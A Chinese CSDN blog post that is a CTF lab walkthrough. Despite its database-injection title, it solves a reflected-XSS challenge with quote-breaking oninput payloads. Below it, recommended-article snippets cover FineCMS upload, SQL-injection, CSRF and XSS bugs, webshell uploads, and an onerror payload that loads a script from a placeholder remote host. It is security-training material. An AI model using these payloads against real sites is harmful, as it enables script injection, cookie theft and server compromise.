【封神台】数据库注入 wp

最新推荐文章于 2024-07-17 17:25:50 发布
最新推荐文章于 2024-07-17 17:25:50 发布
阅读量412 收藏 1
点赞数 1
分类专栏: CTF 技术学习 文章标签: web 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35938621/article/details/119716117
版权

前言

  • 掌控安全里面的靶场前端渗透/XSS,学习一下!

反射型XSS

  • 环境:http://b-ref-xss-1s.lab.aqlab.cn/
  • 了解一下
  • 一般证明XSS是否存在,就是在正常页面传参然后构建参数让他弹窗就是存在XSS了
    XSS一般在什么业务场景容易遇见?
    重灾区:评论区、留言区、个人信息、订单信息等。
    针对型:站内信、网页即时通讯、私信、意见反馈。
    存在风险:搜索框、当前目录、图片属性等。
  • 遵循一个原则,见框就X

image-20210805092731188

  • 发现并没有什么反应,审计元素看看代码F12

image-20210805092837982

  • 输入双引号发现被转义了,那就输入单引号来闭合
' oninput=alert(/xss/)

image-20210805093254599

  • 用\转义,或者用//来注释都行
' oninput=alert(/xss/) \

image-20210805093354847

  • 接着输入一个任意字符就可以拿flag

最低0.47元/天 解锁文章
孤桜懶契
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
FineCMS任意头像上传漏洞复现:文件的四次上传
Miracle_ze的博客
08-16 1443
1、第一次绕过代码没有文件再次检测,采用传包含文件夹的压缩包绕过或使用时间竞争漏洞绕过2、第二个绕过代码添加了递归对文件夹再次检测,但由于没有间竞争漏洞绕过问题。使用间竞争漏洞绕过3、第三次绕过代码进行随机命名文件无法猜文件名间竞争漏洞绕过失效,但是可以采用解压一半报错保存php文件4、第四次绕过代码对报错保留的文件进行了递归删除,但是我们可以欺骗系统将解码的文件判定为上级目录文件规避了递归在当前目录下是所有检测。其实这种漏洞补一处出现处,要从根本解决。.........
finecms-含有前台文件上传漏洞源码包.zip
01-04
finecms-含有前台文件上传漏洞源码包,亲测真实有效、可用!如有侵权,请联系CSDN管理员删除
Finecms SQL注入漏洞 (CVE-2018-6893)
m0_65150886的博客
01-08 915
借此漏洞,可导致数据库中存放的用户的隐私信息的泄露,严重的可导致网页篡改;网站被挂马,传播恶意软件;修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;服务器被远程控制,被安装后门。Finecms 5.2.0版本中的controllers/member/Api.php文件存在SQL注入漏洞,该漏洞源于程序没有进行有效的过滤。远程攻击者可利用该漏洞执行SQL命令。1.访问http://ip:port,出现如下页面,开始实验。
web安全-文件上传漏洞-某CMS及CVE编号文件上传漏洞测试以及实例讲解
ran的博客
01-27 1825
可以看到访问后可以实现上图所示的效果,因为我们这里上传的是普通图片,不是jsp代码,所以网页返回的是一堆乱码,如果我们上传的文件是jsp文件,网页就会返回isp代码执行后的内容。在网址内添加此路径进行搜索,在回显的页面内可以看到上传的文件成功以php的形式进行了执行(因为这里上传的是图片,且没有进行修改,所以返回的全部是乱码)。将“png”改为“php”后放包,正常在上传完文件之后,会返回一个文件的地址,但是这里地址没有显示,并出现了报错。按照搜索到的方法,将“png”改为“php”后放包。
FineCMS 5.0.10漏洞集合
Unitue_逆流
10-12 9335
笔记地址: https://www.ichunqiu.com/course/59007 操作机: Windows xp IP:172.16.11.2目标机: Windows xp IP:172.16.12.2实验目的: 学习漏洞产生的原理 学习如何对此漏洞进行利用修复实验内容: FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统。其5.0.10
神台-杂项8:奇怪的短信
03-11
随波逐流工具,一个非常好用的解码工具
远古神Server(erlang源码)+文档+mongodb数据库
05-07
《远古神Server:基于Erlang的服务器架构与MongoDB数据库集成解析》 本文将深入探讨"远古神Server"项目,这是一个采用Erlang编程语言构建的游戏服务器,搭配MongoDB数据库来实现高效的数据存储和处理。Erlang以...
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神架设视频教程.mp4
07-25
神架设视频教程
神无敌架设视频教程.mp4
07-31
神无敌架设视频教程
finecms-XSS(cve-2017-11629)
m0_65150886的博客
01-08 857
dayrui FineCms 5.0.10及之前的版本中的controllers/api.php文件存在跨站脚本漏洞。远程攻击者可借助c=api&m=data2请求中的‘function’参数利用该漏洞注入任意的Web脚本或HTML。Dayrui FineCms是中国天睿(Dayrui)程序设计团队发布的一套使用MVC架构和PDO数据库接口开发的内容管理系统(CMS)。借此漏洞,攻击者可以窃取用户Cookie;2.对输入和URL参数进行过滤(白名单和黑名单)1.访问http://ip:port,进入首页。
某finecms的csrf漏洞(CVE-2018-18191)
FODKING的博客
12-10 3677
原理 CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。 CSRF能够做的事情包括:以
finecms XSS (CVE-2017-11629)
最新发布
qq_23003811的博客
07-17 208
Dayrui FineCms是中国天睿(Dayrui)程序设计团队发布的一套使用MVC架构和PDO数据库接口开发的内容管理系统(CMS)。dayrui FineCms 5.0.10及之前的版本中的controllers/api.php文件存在跨站脚本漏洞。远程攻击者可借助c=api&m=data2请求中的‘function’参数利用该漏洞注入任意的Web脚本或HTML。dayrui FineCms 5.0.10及之前的版本。四、漏洞复现(怎么拿flag)?
【漏洞学习——XSS】fineCMS免费版xss+getshell
Fly_鹏程万里
02-22 1818
漏洞细节 注册一个用户,在发表文章的地方发表文章 在编辑器里加入一张图片 用firebug修改图片地址 加入onerror属性 onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js' 因为发表的文章需要后台管理员审核的,当管理员审核的时候触发漏洞 然后是getsh...
finecms aip.php漏洞,FineCMS漏洞挖掘
weixin_32494599的博客
03-11 549
0x00 背景最近在挖掘FineCMS源码的漏洞,发现了一些有趣的洞,斗哥计划先从配置文件写入开始分析,然后再结合存储XSS进行GetShell,本篇先分析配置文件写入的问题,下周再分析存储XSS的问题,最终通过这两类洞的组合利用GetShell,大体思路流程很简单,但是代码分析中有蛮多技巧,期待与师傅们的交流讨论。0x01 漏洞审计1x00 相关环境源码信息:FineCMS v5.3.0 bul...
day34WEB 攻防-通用漏洞&文件上传&黑白盒审计&逻辑&中间件&外部引用
m0_69583059的博客
01-27 1088
无法上传php文件,但是通过修改名称抓包,将后缀改掉可以成功将文件后缀该成.php,但是.php文件并不能执行,没有执行权限,因为同目录下有.htaccess文件,限制了php文件的权限。通过抓包发现,请求数据包并没有看到图片的名称以及类型,这里猜测tk的值就是图片信息,并且进行了base64编码,这里解码tk值看看。返回404错误,现在有两种可能,一就是没有上传成功,二就是上传成功但是路径不一样了,或者文件名被改了。发现执行成功,说明我们刚刚上传的php文件上传成功了,只是名称被改了。
finecms aip.php漏洞,FineCMS最新getshell漏洞通杀FineCMS5.0.8一下版本 | CN-SEC 中文网
weixin_39610229的博客
03-11 253
摘要在文件finecms/dayrui/controllers/member/Api.php里面有一个down_file函数.可以从远程下载文件到本地服务器.在文件finecms/dayrui/controllers/member/Api.php里面有一个down_file函数.可以从远程下载文件到本地服务器.public function down_file() { $p = ar...
finecms SQL注入(CVE-2017-11582)
m0_65150886的博客
01-08 676
其中任意文件上传漏洞在上传用户头像处,可通过上传一句话木马,修改数据包内容,获取网站Shell。而SQL注入漏洞则可以通过注入获取到管理员的账号密码。FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统。其5.0.10版本存在任意文件上传和SQL注入漏洞。6.修改jpeg为php,并将文件内容改为php一句话木马,并对其进行base64编码。1.访问http://ip:port,进入登录界面。5.点击上传头像,上传一个jpg图片,并抓包。3.通过报错注入查询当前用户。
智慧校园管理系统 前台任意文件上传漏洞
孤桜懶契
03-31 3445
漏洞描述 智慧校园管理系统前台注册页面存在文件上传,由于没有对上传的文件进行审查导致可上传恶意文件控制服务器 漏洞影响 s ✅智慧校园管理系统 空间测绘 d ⭕body="DC_Login/QYSignUp" 漏洞复现 ✅企业注册界面存在漏洞 上传附件 上传一个冰蝎马 会有返回路径 连接地址 个人博客 孤桜懶契:https://gylq.gitee.io/time ...
c4d修神记:零基础到三维神 下载
01-05
"c4d修神记:零基础到三维神"是一本关于学习Cinema 4D(简称C4D)软件的书籍。C4D是一款强大的三维建模、动画和渲染软件,广泛应用于电影、游戏、广告等领域。该书以零基础的读者为目标群体,旨在通过系统的教程和实例,帮助读者从初学者成长为能够独立完成三维设计与制作的专业人士。 该书提供了C4D软件的下载地址,读者可以通过该链接下载安装C4D软件到自己的电脑中。安装完成后,读者可以按照书中的指导步骤,逐步学习C4D的操作技巧和基本概念。从最基础的界面介绍、视图操作,到三维模型的建立、材质的添加、动画的制作等各个方面都有详细的讲解和实例演示。 随着阅读的深入,读者将学习到更高级别的技巧和应用,如灯光设置、摄像机调整、特效制作等。作者通过生动的插图和实际案例,使读者能够更好地理解并掌握C4D的使用方法。 "C4D修神记:零基础到三维神"不仅可以帮助读者快速入门C4D软件,还能够启迪读者的创作灵感,提供了丰富的设计思路和技巧。这本书的出版对于有志于学习和从事三维设计的读者来说是一次难得的机会和宝贵的参考资料。无论是对于初学者还是对于有一定基础的人士来说,这本书都能够带领他们迈向更高的技能和创作水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孤桜懶契

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值